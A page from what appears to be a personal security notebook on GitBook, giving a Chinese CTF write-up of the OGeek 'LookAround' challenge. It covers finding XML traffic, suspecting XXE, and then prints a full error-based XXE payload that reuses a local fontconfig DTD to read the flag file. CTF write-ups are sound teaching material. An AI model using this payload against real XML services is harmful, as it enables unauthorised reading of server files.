wang kun' book
  • 目录
  • 环境配置
    • 2019年
      • Cobalt Strike kail的安装
      • vps配置ngrok反向代理
  • CTF WEB
    • 2019年
      • Spring boot SSTI
      • XML中XXE漏洞
        • XML和XXE基础
  • CTF Misc
    • 记一次PNG中的隐写
  • 渗透工具
    • Netcat
    • Metasploit
      • Untitled
      • Msfvenom常用payload
    • CobaltStrike生成windows木马
    • vps部署自动化src挖掘
    • SET社会工程工具包
  • 漏洞复现
    • CVE-2019-0708获取shell
  • hexo github搭建博客
    • 一. Hexo搭建个人博客
    • 二.Hexo添加主题
    • Hexo下的站点配置文件
    • 自定义主题
Powered by GitBook
On this page
  • 1.F12查看源码,发现一个js/_.js文件
  • 2.使用burpsuite代理查看,发现是用XML传输数据包,怀疑存在XXE漏洞
  • 3.测试内部回显,没有异常
  • 4.尝试构造DTD,查看异常,缺少filename
  • 5.根据题目提示,需要使用tomcat:8-jre8 ,使用外部DTD声明
  • 6.使用docker去安装,但好像不需要了,巴黎黑客大会给出了一个payload
  • 7.得到flag

Was this helpful?

  1. CTF WEB
  2. 2019年

XML中XXE漏洞

OGeek中的LookAround

PreviousSpring boot SSTINextXML和XXE基础

Last updated 5 years ago

Was this helpful?

1.F12查看源码,发现一个js/_.js文件

2.使用burpsuite代理查看,发现是用XML传输数据包,怀疑存在XXE漏洞

3.测试内部回显,没有异常

4.尝试构造DTD,查看异常,缺少filename

5.根据题目提示,需要使用tomcat:8-jre8 ,使用外部DTD声明

6.使用docker去安装,但好像不需要了,巴黎黑客大会给出了一个payload

<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % expr 'aaa)>
<!ENTITY &#x25; file SYSTEM "file:///flag">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>
">
&#x25;eval;
&#x25;error;
<!ELEMENT aa (bb'>
%local_dtd;
]>

7.得到flag

https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation